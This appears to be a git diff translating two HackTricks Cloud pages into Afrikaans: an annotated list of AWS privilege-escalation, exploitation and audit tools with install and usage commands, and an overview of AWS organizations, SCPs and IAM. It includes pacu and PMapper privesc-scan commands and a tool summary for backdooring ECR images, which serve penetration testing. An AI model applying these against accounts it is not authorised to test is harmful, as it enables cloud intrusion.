+- [**aws-inventory**](https://github.com/nccgroup/aws-inventory): (Gebruik python2) Dit is 'n hulpmiddel wat probeer om **alle** [**AWS hulpbronne**](https://docs.aws.amazon.com/general/latest/gr/glos-chap.html#resource) wat in 'n rekening geskep is, te **ontdek**.
+- [**aws_public_ips**](https://github.com/arkadiyt/aws_public_ips): Dit is 'n hulpmiddel om **alle publieke IP-adresse** (beide IPv4/IPv6) wat met 'n AWS-rekening geassosieer is, te **verkry**.
 
 ### Privesc & Exploiting
 
-- [**SkyArk**](https://github.com/cyberark/SkyArk)**:** Discover the most privileged users in the scanned AWS environment, including the AWS Shadow Admins. It uses powershell. You can find the **definition of privileged policies** in the function **`Check-PrivilegedPolicy`** in [https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1](https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1).
-- [**pacu**](https://github.com/RhinoSecurityLabs/pacu): Pacu is an open-source **AWS exploitation framework**, designed for offensive security testing against cloud environments. It can **enumerate**, find **miss-configurations** and **exploit** them. You can find the **definition of privileged permissions** in [https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam\_\_privesc_scan/main.py#L134](https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__privesc_scan/main.py#L134) inside the **`user_escalation_methods`** dict.
-  - Note that pacu **only checks your own privescs paths** (not account wide).
-
+- [**SkyArk**](https://github.com/cyberark/SkyArk)**:** Ontdek die mees bevoorregte gebruikers in die gescande AWS-omgewing, insluitend die AWS Shadow Admins. Dit gebruik powershell. Jy kan die **definisie van bevoorregte beleide** in die funksie **`Check-PrivilegedPolicy`** vind in [https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1](https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1).
+- [**pacu**](https://github.com/RhinoSecurityLabs/pacu): Pacu is 'n oopbron **AWS eksploitering raamwerk**, ontwerp vir offensiewe sekuriteitstoetsing teen wolkomgewings. Dit kan **opnoem**, **mis-konfigurasies** vind en dit **eksploiteer**. Jy kan die **definisie van bevoorregte toestemmings** vind in [https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam\_\_privesc_scan/main.py#L134](https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__privesc_scan/main.py#L134) binne die **`user_escalation_methods`** dict.
+- Let daarop dat pacu **slegs jou eie privesc-paaie nagaan** (nie rekeningwyd nie).
 ```bash
 # Install
 ## Feel free to use venvs
@@ -264,9 +255,7 @@ pacu
 > exec iam__enum_permissions # Get permissions
 > exec iam__privesc_scan # List privileged permissions
 ```
-
-- [**PMapper**](https://github.com/nccgroup/PMapper): Principal Mapper (PMapper) is a script and library for identifying risks in the configuration of AWS Identity and Access Management (IAM) for an AWS account or an AWS organization. It models the different IAM Users and Roles in an account as a directed graph, which enables checks for **privilege escalation** and for alternate paths an attacker could take to gain access to a resource or action in AWS. You can check the **permissions used to find privesc** paths in the filenames ended in `_edges.py` in [https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing](https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing)
-
+- [**PMapper**](https://github.com/nccgroup/PMapper): Principal Mapper (PMapper) is 'n skrif en biblioteek vir die identifisering van risiko's in die konfigurasie van AWS Identity and Access Management (IAM) vir 'n AWS-rekening of 'n AWS-organisasie. Dit modelleer die verskillende IAM-gebruikers en rolle in 'n rekening as 'n gerigte grafiek, wat toelaat dat kontroles vir **privilege escalation** en vir alternatiewe paaie wat 'n aanvaller kan neem om toegang tot 'n hulpbron of aksie in AWS te verkry, gedoen word. Jy kan die **permissions used to find privesc** paaie in die lêername wat eindig op `_edges.py` in [https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing](https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing) nagaan.
 ```bash
 # Install
 pip install principalmapper
@@ -288,10 +277,8 @@ pmapper --profile dev query 'preset privesc *' # Get privescs with admins
 pmapper --profile dev orgs create
 pmapper --profile dev orgs display
 ```
-
-- [**cloudsplaining**](https://github.com/salesforce/cloudsplaining): Cloudsplaining is an AWS IAM Security Assessment tool that identifies violations of least privilege and generates a risk-prioritized HTML report.\
-  It will show you potentially **over privileged** customer, inline and aws **policies** and which **principals has access to them**. (It not only checks for privesc but also other kind of interesting permissions, recommended to use).
-
+- [**cloudsplaining**](https://github.com/salesforce/cloudsplaining): Cloudsplaining is 'n AWS IAM Sekuriteitsbeoordeling hulpmiddel wat oortredings van die minste voorreg identifiseer en 'n risiko-geprioritiseerde HTML-verslag genereer.\
+Dit sal jou moontlik **oorvoorregte** kliënt, inline en aws **beleide** wys en watter **beginsels toegang tot hulle het**. (Dit kontroleer nie net vir privesc nie, maar ook ander soort interessante toestemmings, dit word aanbeveel om te gebruik).
 ```bash
 # Install
 pip install cloudsplaining
@@ -303,24 +290,20 @@ cloudsplaining download --profile dev
 # Analyze the IAM policies
 cloudsplaining scan --input-file /private/tmp/cloudsplaining/dev.json --output /tmp/files/
 ```
-
-- [**cloudjack**](https://github.com/prevade/cloudjack): CloudJack assesses AWS accounts for **subdomain hijacking vulnerabilities** as a result of decoupled Route53 and CloudFront configurations.
-- [**ccat**](https://github.com/RhinoSecurityLabs/ccat): List ECR repos -> Pull ECR repo -> Backdoor it -> Push backdoored image
-- [**Dufflebag**](https://github.com/bishopfox/dufflebag): Dufflebag is a tool that **searches** through public Elastic Block Storage (**EBS) snapshots for secrets** that may have been accidentally left in.
+- [**cloudjack**](https://github.com/prevade/cloudjack): CloudJack evalueer AWS-rekeninge vir **subdomein-hijacking kwesbaarhede** as gevolg van ontkoppelde Route53 en CloudFront konfigurasies.
+- [**ccat**](https://github.com/RhinoSecurityLabs/ccat): Lys ECR repos -> Trek ECR repo -> Agterdeur dit -> Stoot agterdeur beeld
+- [**Dufflebag**](https://github.com/bishopfox/dufflebag): Dufflebag is 'n hulpmiddel wat **soek** deur openbare Elastic Block Storage (**EBS) snappies vir geheime** wat dalk per ongeluk agtergelaat is.
 
 ### Audit
 
-- [**cloudsploit**](https://github.com/aquasecurity/cloudsploit)**:** CloudSploit by Aqua is an open-source project designed to allow detection of **security risks in cloud infrastructure** accounts, including: Amazon Web Services (AWS), Microsoft Azure, Google Cloud Platform (GCP), Oracle Cloud Infrastructure (OCI), and GitHub (It doesn't look for ShadowAdmins).
-
+- [**cloudsploit**](https://github.com/aquasecurity/cloudsploit)**:** CloudSploit deur Aqua is 'n oopbronprojek wat ontwerp is om die opsporing van **veiligheidsrisiko's in wolkinfrastruktuur** rekeninge moontlik te maak, insluitend: Amazon Web Services (AWS), Microsoft Azure, Google Cloud Platform (GCP), Oracle Cloud Infrastructure (OCI), en GitHub (Dit soek nie na ShadowAdmins nie).
 ```bash
 ./index.js --csv=file.csv --console=table --config ./config.js
 
 # Compiance options: --compliance {hipaa,cis,cis1,cis2,pci}
 ## use "cis" for cis level 1 and 2
 ```
-
-- [**Prowler**](https://github.com/prowler-cloud/prowler): Prowler is an Open Source security tool to perform AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness.
-
+- [**Prowler**](https://github.com/prowler-cloud/prowler): Prowler is 'n Open Source sekuriteitstoepassing om AWS sekuriteit beste praktyke assesserings, ouditte, insidentrespons, deurlopende monitering, verharding en forensiese gereedheid uit te voer.
 ```bash
 # Install python3, jq and git
 # Install
@@ -331,15 +314,11 @@ prowler -v
 prowler <provider>
 prowler aws --profile custom-profile [-M csv json json-asff html]
 ```
-
-- [**CloudFox**](https://github.com/BishopFox/cloudfox): CloudFox helps you gain situational awareness in unfamiliar cloud environments. It’s an open source command line tool created to help penetration testers and other offensive security professionals find exploitable attack paths in cloud infrastructure.
-
+- [**CloudFox**](https://github.com/BishopFox/cloudfox): CloudFox help jou om situasionele bewustheid te verkry in onbekende wolkomgewings. Dit is 'n oopbron-opdraglyn hulpmiddel wat geskep is om penetrasietoetsers en ander offensiewe sekuriteitsprofessionals te help om ontginbare aanvalspaaie in wolkinfrastruktuur te vind.
 ```bash
 cloudfox aws --profile [profile-name] all-checks
 ```
-
-- [**ScoutSuite**](https://github.com/nccgroup/ScoutSuite): Scout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments.
-
+- [**ScoutSuite**](https://github.com/nccgroup/ScoutSuite): Scout Suite is 'n oopbron multi-cloud sekuriteitsouditering hulpmiddel, wat sekuriteitsposisie assessering van wolkomgewings moontlik maak.
 ```bash
 # Install
 virtualenv -p python3 venv
@@ -350,18 +329,16 @@ scout --help
 # Get info
 scout aws -p dev
 ```
+- [**cs-suite**](https://github.com/SecurityFTW/cs-suite): Cloud Security Suite (gebruik python2.7 en lyk ononderhoude)
+- [**Zeus**](https://github.com/DenizParlak/Zeus): Zeus is 'n kragtige hulpmiddel vir AWS EC2 / S3 / CloudTrail / CloudWatch / KMS beste versterking praktyke (lyk ononderhoude). Dit kontroleer slegs standaard geconfigureerde kredensies binne die stelsel.
 
-- [**cs-suite**](https://github.com/SecurityFTW/cs-suite): Cloud Security Suite (uses python2.7 and looks unmaintained)
-- [**Zeus**](https://github.com/DenizParlak/Zeus): Zeus is a powerful tool for AWS EC2 / S3 / CloudTrail / CloudWatch / KMS best hardening practices (looks unmaintained). It checks only default configured creds inside the system.
+### Konstante Oudit
 
-### Constant Audit
-
-- [**cloud-custodian**](https://github.com/cloud-custodian/cloud-custodian): Cloud Custodian is a rules engine for managing public cloud accounts and resources. It allows users to **define policies to enable a well managed cloud infrastructure**, that's both secure and cost optimized. It consolidates many of the adhoc scripts organizations have into a lightweight and flexible tool, with unified metrics and reporting.
-- [**pacbot**](https://github.com/tmobile/pacbot)**: Policy as Code Bot (PacBot)** is a platform for **continuous compliance monitoring, compliance reporting and security automation for the clou**d. In PacBot, security and compliance policies are implemented as code. All resources discovered by PacBot are evaluated against these policies to gauge policy conformance. The PacBot **auto-fix** framework provides the ability to automatically respond to policy violations by taking predefined actions.
-- [**streamalert**](https://github.com/airbnb/streamalert)**:** StreamAlert is a serverless, **real-time** data analysis framework which empowers you to **ingest, analyze, and alert** on data from any environment, u**sing data sources and alerting logic you define**. Computer security teams use StreamAlert to scan terabytes of log data every day for incident detection and response.
-
-## DEBUG: Capture AWS cli requests
+- [**cloud-custodian**](https://github.com/cloud-custodian/cloud-custodian): Cloud Custodian is 'n reëlsengine vir die bestuur van openbare wolk rekeninge en hulpbronne. Dit stel gebruikers in staat om **beleide te definieer om 'n goed bestuurde wolkinfrastruktuur te enable**, wat beide veilig en koste-geoptimaliseer is. Dit konsolideer baie van die ad-hoc skripte wat organisasies het in 'n liggewig en buigsame hulpmiddel, met verenigde metrieke en verslagdoening.
+- [**pacbot**](https://github.com/tmobile/pacbot)**: Policy as Code Bot (PacBot)** is 'n platform vir **deurlopende nakoming monitering, nakoming verslagdoening en sekuriteit outomatisering vir die wolk**. In PacBot word sekuriteit en nakoming beleide as kode geïmplementeer. Alle hulpbronne wat deur PacBot ontdek word, word geëvalueer teen hierdie beleide om beleidskonformiteit te meet. Die PacBot **auto-fix** raamwerk bied die vermoë om outomaties te reageer op beleids oortredings deur vooraf gedefinieerde aksies te neem.
+- [**streamalert**](https://github.com/airbnb/streamalert)**:** StreamAlert is 'n serverless, **regte-tyd** data analise raamwerk wat jou in staat stel om **data van enige omgewing in te neem, te analiseer en te waarsku** , met **data bronne en waarskuwing logika wat jy definieer**. Rekenaar sekuriteitspanne gebruik StreamAlert om terabytes van logdata elke dag te skandeer vir insidentdetectie en -reaksie.
 
+## DEBUG: Capture AWS cli versoeke
 ```bash
 # Set proxy
 export HTTP_PROXY=http://localhost:8080
@@ -380,14 +357,9 @@ export AWS_CA_BUNDLE=~/Downloads/certificate.pem
 # Run aws cli normally trusting burp cert
 aws ...
 ```
-
-## References
+## Verwysings
 
 - [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ)
 - [https://cloudsecdocs.com/aws/defensive/tooling/audit/](https://cloudsecdocs.com/aws/defensive/tooling/audit/)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-basic-information/README.md b/src/pentesting-cloud/aws-security/aws-basic-information/README.md
index 02e6e7729..4210e4962 100644
--- a/src/pentesting-cloud/aws-security/aws-basic-information/README.md
+++ b/src/pentesting-cloud/aws-security/aws-basic-information/README.md
@@ -1,331 +1,313 @@
-# AWS - Basic Information
+# AWS - Basiese Inligting
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Organization Hierarchy
+## Organisasie Hiërargie
 
 ![](<../../../images/image (151).png>)
 
-### Accounts
+### Rekeninge
 
-In AWS there is a **root account,** which is the **parent container for all the accounts** for your **organization**. However, you don't need to use that account to deploy resources, you can create **other accounts to separate different AWS** infrastructures between them.
+In AWS is daar 'n **root rekening,** wat die **ouerhouer is vir al die rekening** vir jou **organisasie**. U hoef egter nie daardie rekening te gebruik om hulpbronne te ontplooi nie, u kan **ander rekeninge skep om verskillende AWS** infrastruktuur van mekaar te skei.
 
-This is very interesting from a **security** point of view, as **one account won't be able to access resources from other account** (except bridges are specifically created), so this way you can create boundaries between deployments.
+Dit is baie interessant vanuit 'n **veiligheid** oogpunt, aangesien **een rekening nie in staat sal wees om hulpbronne van 'n ander rekening te benader** (behalwe as brûe spesifiek geskep word), so op hierdie manier kan u grense tussen ontplooiings skep.
 
-Therefore, there are **two types of accounts in an organization** (we are talking about AWS accounts and not User accounts): a single account that is designated as the management account, and one or more member accounts.
+Daarom is daar **twee tipes rekeninge in 'n organisasie** (ons praat van AWS rekeninge en nie gebruikersrekeninge nie): 'n enkele rekening wat as die bestuurrekening aangewys word, en een of meer lidrekeninge.
 
-- The **management account (the root account)** is the account that you use to create the organization. From the organization's management account, you can do the following:
+- Die **bestuurrekening (die root rekening)** is die rekening wat u gebruik om die organisasie te skep. Van die organisasie se bestuurrekening kan u die volgende doen:
 
-  - Create accounts in the organization
-  - Invite other existing accounts to the organization
-  - Remove accounts from the organization
-  - Manage invitations
-  - Apply policies to entities (roots, OUs, or accounts) within the organization
-  - Enable integration with supported AWS services to provide service functionality across all of the accounts in the organization.
-  - It's possible to login as the root user using the email and password used to create this root account/organization.
+- Skep rekeninge in die organisasie
+- Nooi ander bestaande rekeninge na die organisasie
+- Verwyder rekeninge uit die organisasie
+- Bestuur uitnodigings
+- Pas beleide toe op entiteite (wortels, OU's, of rekeninge) binne die organisasie
+- Aktiveer integrasie met ondersteunende AWS dienste om diensfunksionaliteit oor al die rekeninge in die organisasie te bied.
+- Dit is moontlik om in te log as die root gebruiker met die e-pos en wagwoord wat gebruik is om hierdie root rekening/organisasie te skep.
 
-  The management account has the **responsibilities of a payer account** and is responsible for paying all charges that are accrued by the member accounts. You can't change an organization's management account.
-
-- **Member accounts** make up all of the rest of the accounts in an organization. An account can be a member of only one organization at a time. You can attach a policy to an account to apply controls to only that one account.
-  - Member accounts **must use a valid email address** and can have a **name**, in general they wont be able to manage the billing (but they might be given access to it).
+Die bestuurrekening het die **verantwoordelikhede van 'n betaler rekening** en is verantwoordelik vir die betaling van alle koste wat deur die lidrekeninge opgeloop word. U kan nie 'n organisasie se bestuurrekening verander nie.
 
+- **Lidrekeninge** maak al die res van die rekeninge in 'n organisasie uit. 'n Rekening kan slegs 'n lid van een organisasie op 'n slag wees. U kan 'n beleid aan 'n rekening koppel om kontroles slegs op daardie een rekening toe te pas.
+- Lidrekeninge **moet 'n geldige e-posadres gebruik** en kan 'n **naam** hê, in die algemeen sal hulle nie in staat wees om die faktuur te bestuur nie (maar hulle mag toegang daartoe gegee word).
 ```
 aws organizations create-account --account-name testingaccount --email testingaccount@lalala1233fr.com
 ```
+### **Organisasie-eenhede**
 
-### **Organization Units**
-
-Accounts can be grouped in **Organization Units (OU)**. This way, you can create **policies** for the Organization Unit that are going to be **applied to all the children accounts**. Note that an OU can have other OUs as children.
-
+Rekeninge kan gegroepeer word in **Organisasie-eenhede (OU)**. Op hierdie manier kan jy **beleide** vir die Organisasie-eenheid skep wat gaan wees **toegepas op al die kindrekening**. Let daarop dat 'n OU ander OU's as kinders kan hê.
 ```bash
 # You can get the root id from aws organizations list-roots
 aws organizations create-organizational-unit --parent-id r-lalala --name TestOU
 ```
-
 ### Service Control Policy (SCP)
 
-A **service control policy (SCP)** is a policy that specifies the services and actions that users and roles can use in the accounts that the SCP affects. SCPs are **similar to IAM** permissions policies except that they **don't grant any permissions**. Instead, SCPs specify the **maximum permissions** for an organization, organizational unit (OU), or account. When you attach a SCP to your organization root or an OU, the **SCP limits permissions for entities in member accounts**.
+'n **service control policy (SCP)** is 'n beleid wat die dienste en aksies spesifiseer wat gebruikers en rolle in die rekeninge wat die SCP beïnvloed, kan gebruik. SCP's is **soortgelyk aan IAM** toestemmingsbeleide, behalwe dat hulle **nie enige toestemmings toeken nie**. In plaas daarvan spesifiseer SCP's die **maksimum toestemmings** vir 'n organisasie, organisatoriese eenheid (OU), of rekening. Wanneer jy 'n SCP aan jou organisasie wortel of 'n OU heg, **beperk die SCP toestemmings vir entiteite in lid rekeninge**.
 
-This is the ONLY way that **even the root user can be stopped** from doing something. For example, it could be used to stop users from disabling CloudTrail or deleting backups.\
-The only way to bypass this is to compromise also the **master account** that configures the SCPs (master account cannot be blocked).
+Dit is die ENIGE manier waarop **selfs die wortelgebruiker gestop kan word** om iets te doen. Byvoorbeeld, dit kan gebruik word om gebruikers te stop om CloudTrail te deaktiveer of rugsteun te verwyder.\
+Die enigste manier om dit te omseil, is om ook die **master account** wat die SCP's konfigureer, te kompromitteer (master account kan nie geblokkeer word nie).
 
 > [!WARNING]
-> Note that **SCPs only restrict the principals in the account**, so other accounts are not affected. This means having an SCP deny `s3:GetObject` will not stop people from **accessing a public S3 bucket** in your account.
+> Let daarop dat **SCP's slegs die principals in die rekening beperk**, so ander rekeninge word nie beïnvloed nie. Dit beteken dat 'n SCP wat `s3:GetObject` weier, nie mense sal stop om **toegang te verkry tot 'n openbare S3-bucket** in jou rekening nie.
 
-SCP examples:
+SCP voorbeelde:
 
-- Deny the root account entirely
-- Only allow specific regions
-- Only allow white-listed services
-- Deny GuardDuty, CloudTrail, and S3 Public Block Access from
+- Weier die wortelrekening heeltemal
+- Laat slegs spesifieke streke toe
+- Laat slegs witgelysde dienste toe
+- Weier GuardDuty, CloudTrail, en S3 Publieke Blok Toegang van
 
-  being disabled
+om gedeaktiveer te word
 
-- Deny security/incident response roles from being deleted or
+- Weier sekuriteit/voorval respons rolle om verwyder of
 
-  modified.
+gewysig te word.
 
-- Deny backups from being deleted.
-- Deny creating IAM users and access keys
+- Weier rugsteun om verwyder te word.
+- Weier die skep van IAM gebruikers en toegang sleutels
 
-Find **JSON examples** in [https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html)
+Vind **JSON voorbeelde** in [https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html)
 
 ### ARN
 
-**Amazon Resource Name** is the **unique name** every resource inside AWS has, its composed like this:
-
+**Amazon Resource Name** is die **unieke naam** wat elke hulpbron binne AWS het, dit is soos volg saamgestel:
 ```
 arn:partition:service:region:account-id:resource-type/resource-id
 arn:aws:elasticbeanstalk:us-west-1:123456789098:environment/App/Env
 ```
-
-Note that there are 4 partitions in AWS but only 3 ways to call them:
+Note dat daar 4 partities in AWS is, maar slegs 3 maniere om hulle te noem:
 
 - AWS Standard: `aws`
 - AWS China: `aws-cn`
-- AWS US public Internet (GovCloud): `aws-us-gov`
+- AWS US publieke Internet (GovCloud): `aws-us-gov`
 - AWS Secret (US Classified): `aws`
 
-## IAM - Identity and Access Management
+## IAM - Identiteit en Toegang Bestuur
 
-IAM is the service that will allow you to manage **Authentication**, **Authorization** and **Access Control** inside your AWS account.
+IAM is die diens wat jou sal toelaat om **Verifikasie**, **Magtiging** en **Toegangsbeheer** binne jou AWS-rekening te bestuur.
 
-- **Authentication** - Process of defining an identity and the verification of that identity. This process can be subdivided in: Identification and verification.
-- **Authorization** - Determines what an identity can access within a system once it's been authenticated to it.
-- **Access Control** - The method and process of how access is granted to a secure resource
+- **Verifikasie** - Proses om 'n identiteit te definieer en die verifikasie van daardie identiteit. Hierdie proses kan onderverdeel word in: Identifikasie en verifikasie.
+- **Magtiging** - Bepaal wat 'n identiteit kan toegang tot binne 'n stelsel nadat dit geverifieer is.
+- **Toegangsbeheer** - Die metode en proses van hoe toegang tot 'n veilige hulpbron toegestaan word.
 
-IAM can be defined by its ability to manage, control and govern authentication, authorization and access control mechanisms of identities to your resources within your AWS account.
+IAM kan gedefinieer word deur sy vermoë om verifikasie, magtiging en toegangsbeheer meganismes van identiteite na jou hulpbronne binne jou AWS-rekening te bestuur, te beheer en te regeer.
 
-### [AWS account root user](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html) <a href="#id_root" id="id_root"></a>
+### [AWS rekening wortel gebruiker](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html) <a href="#id_root" id="id_root"></a>
 
-When you first create an Amazon Web Services (AWS) account, you begin with a single sign-in identity that has **complete access to all** AWS services and resources in the account. This is the AWS account _**root user**_ and is accessed by signing in with the **email address and password that you used to create the account**.
+Wanneer jy vir die eerste keer 'n Amazon Web Services (AWS) rekening skep, begin jy met 'n enkele aanmeld identiteit wat **volledige toegang tot alle** AWS dienste en hulpbronne in die rekening het. Dit is die AWS rekening _**wortel gebruiker**_ en word verkry deur in te teken met die **e-posadres en wagwoord wat jy gebruik het om die rekening te skep**.
 
-Note that a new **admin user** will have **less permissions that the root user**.
+Let daarop dat 'n nuwe **admin gebruiker** **minder toestemmings sal hê as die wortel gebruiker**.
 
-From a security point of view, it's recommended to create other users and avoid using this one.
+Vanuit 'n sekuriteits oogpunt, word dit aanbeveel om ander gebruikers te skep en om hierdie een te vermy.
 
-### [IAM users](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users.html) <a href="#id_iam-users" id="id_iam-users"></a>
+### [IAM gebruikers](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users.html) <a href="#id_iam-users" id="id_iam-users"></a>
 
-An IAM _user_ is an entity that you create in AWS to **represent the person or application** that uses it to **interact with AWS**. A user in AWS consists of a name and credentials (password and up to two access keys).
+'n IAM _gebruiker_ is 'n entiteit wat jy in AWS skep om **die persoon of toepassing** wat dit gebruik om **met AWS te kommunikeer** te **verteenwoordig**. 'n Gebruiker in AWS bestaan uit 'n naam en geloofsbriewe (wagwoord en tot twee toegang sleutels).
 
-When you create an IAM user, you grant it **permissions** by making it a **member of a user group** that has appropriate permission policies attached (recommended), or by **directly attaching policies** to the user.
+Wanneer jy 'n IAM gebruiker skep, gee jy dit **toestemmings** deur dit 'n **lid van 'n gebruikersgroep** te maak wat toepaslike toestemming beleide het (aanbeveel), of deur **beleide direk aan die gebruiker te heg**.
 
-Users can have **MFA enabled to login** through the console. API tokens of MFA enabled users aren't protected by MFA. If you want to **restrict the access of a users API keys using MFA** you need to indicate in the policy that in order to perform certain actions MFA needs to be present (example [**here**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html)).
+Gebruikers kan **MFA geaktiveer hê om in te teken** deur die konsole. API tokens van MFA geaktiveerde gebruikers is nie deur MFA beskerm nie. As jy wil **die toegang van 'n gebruiker se API sleutels met MFA beperk**, moet jy in die beleid aandui dat om sekere aksies uit te voer, MFA teenwoordig moet wees (voorbeeld [**hier**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html)).
 
 #### CLI
 
-- **Access Key ID**: 20 random uppercase alphanumeric characters like AKHDNAPO86BSHKDIRYT
-- **Secret access key ID**: 40 random upper and lowercase characters: S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU (It's not possible to retrieve lost secret access key IDs).
+- **Toegang Sleutel ID**: 20 ewekansige hoofletters alfanumeriese karakters soos AKHDNAPO86BSHKDIRYT
+- **Geheime toegang sleutel ID**: 40 ewekansige hoë en lae letters: S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU (Dit is nie moontlik om verlore geheime toegang sleutel ID's te herstel nie).
 
-Whenever you need to **change the Access Key** this is the process you should follow:\
-&#xNAN;_&#x43;reate a new access key -> Apply the new key to system/application -> mark original one as inactive -> Test and verify new access key is working -> Delete old access key_
+Wanneer jy die **Toegang Sleutel** moet **verander**, is dit die proses wat jy moet volg:\
+&#xNAN;_&#x43;reate 'n nuwe toegang sleutel -> Pas die nuwe sleutel toe op stelsel/toepassing -> merk oorspronklike een as inaktief -> Toets en verifieer dat die nuwe toegang sleutel werk -> Verwyder ou toegang sleutel_
 
-### MFA - Multi Factor Authentication
+### MFA - Multi Faktor Verifikasie
 
-It's used to **create an additional factor for authentication** in addition to your existing methods, such as password, therefore, creating a multi-factor level of authentication.\
-You can use a **free virtual application or a physical device**. You can use apps like google authentication for free to activate a MFA in AWS.
+Dit word gebruik om 'n **addisionele faktor vir verifikasie** te skep benewens jou bestaande metodes, soos wagwoord, en skep dus 'n multi-faktor vlak van verifikasie.\
+Jy kan 'n **gratis virtuele toepassing of 'n fisiese toestel** gebruik. Jy kan toepassings soos google verifikasie gratis gebruik om 'n MFA in AWS te aktiveer.
 
-Policies with MFA conditions can be attached to the following:
+Beleide met MFA voorwaardes kan aan die volgende geheg word:
 
-- An IAM user or group
-- A resource such as an Amazon S3 bucket, Amazon SQS queue, or Amazon SNS topic
-- The trust policy of an IAM role that can be assumed by a user
-
-If you want to **access via CLI** a resource that **checks for MFA** you need to call **`GetSessionToken`**. That will give you a token with info about MFA.\
-Note that **`AssumeRole` credentials don't contain this information**.
+- 'n IAM gebruiker of groep
+- 'n hulpbron soos 'n Amazon S3 emmer, Amazon SQS tou, of Amazon SNS onderwerp
+- Die vertrouensbeleid van 'n IAM rol wat deur 'n gebruiker aanvaar kan word
 
+As jy 'n hulpbron wil **toegang via CLI** wat **MFA nagaan**, moet jy **`GetSessionToken`** aanroep. Dit sal vir jou 'n token gee met inligting oor MFA.\
+Let daarop dat **`AssumeRole` geloofsbriewe nie hierdie inligting bevat nie**.
 ```bash
 aws sts get-session-token --serial-number <arn_device> --token-code <code>
 ```
+As [**hier genoem**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html), daar is 'n baie verskillende gevalle waar **MFA nie gebruik kan word** nie.
 
-As [**stated here**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html), there are a lot of different cases where **MFA cannot be used**.
+### [IAM gebruikersgroepe](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) <a href="#id_iam-groups" id="id_iam-groups"></a>
 
-### [IAM user groups](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) <a href="#id_iam-groups" id="id_iam-groups"></a>
+'n IAM [gebruikersgroep](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) is 'n manier om **beleide aan verskeie gebruikers** op een slag te **koppel**, wat dit makliker kan maak om die toestemmings vir daardie gebruikers te bestuur. **Rol en groepe kan nie deel wees van 'n groep** nie.
 
-An IAM [user group](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) is a way to **attach policies to multiple users** at one time, which can make it easier to manage the permissions for those users. **Roles and groups cannot be part of a group**.
+Jy kan 'n **identiteitsgebaseerde beleid aan 'n gebruikersgroep** koppel sodat al die **gebruikers** in die gebruikersgroep **die beleid se toestemmings ontvang**. Jy **kan nie** 'n **gebruikersgroep** as 'n **`Principal`** in 'n **beleid** identifiseer (soos 'n hulpbron-gebaseerde beleid) nie, omdat groepe met toestemmings verband hou, nie verifikasie nie, en principals is geverifieerde IAM entiteite.
 
-You can attach an **identity-based policy to a user group** so that all of the **users** in the user group **receive the policy's permissions**. You **cannot** identify a **user group** as a **`Principal`** in a **policy** (such as a resource-based policy) because groups relate to permissions, not authentication, and principals are authenticated IAM entities.
+Hier is 'n paar belangrike eienskappe van gebruikersgroepe:
 
-Here are some important characteristics of user groups:
+- 'n gebruikers **groep** kan **baie gebruikers** **bevat**, en 'n **gebruiker** kan **tot verskeie groepe behoort**.
+- **Gebruikersgroepe kan nie geneste** wees nie; hulle kan slegs gebruikers bevat, nie ander gebruikersgroepe nie.
+- Daar is **geen standaard gebruikersgroep wat outomaties al die gebruikers in die AWS-rekening insluit** nie. As jy 'n gebruikersgroep soos dit wil hê, moet jy dit skep en elke nuwe gebruiker daaraan toewys.
+- Die aantal en grootte van IAM hulpbronne in 'n AWS-rekening, soos die aantal groepe, en die aantal groepe waarvan 'n gebruiker 'n lid kan wees, is beperk. Vir meer inligting, sien [IAM en AWS STS kwotas](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_iam-quotas.html).
 
-- A user **group** can **contain many users**, and a **user** can **belong to multiple groups**.
-- **User groups can't be nested**; they can contain only users, not other user groups.
-- There is **no default user group that automatically includes all users in the AWS account**. If you want to have a user group like that, you must create it and assign each new user to it.
-- The number and size of IAM resources in an AWS account, such as the number of groups, and the number of groups that a user can be a member of, are limited. For more information, see [IAM and AWS STS quotas](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_iam-quotas.html).
+### [IAM rolle](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles.html) <a href="#id_iam-roles" id="id_iam-roles"></a>
 
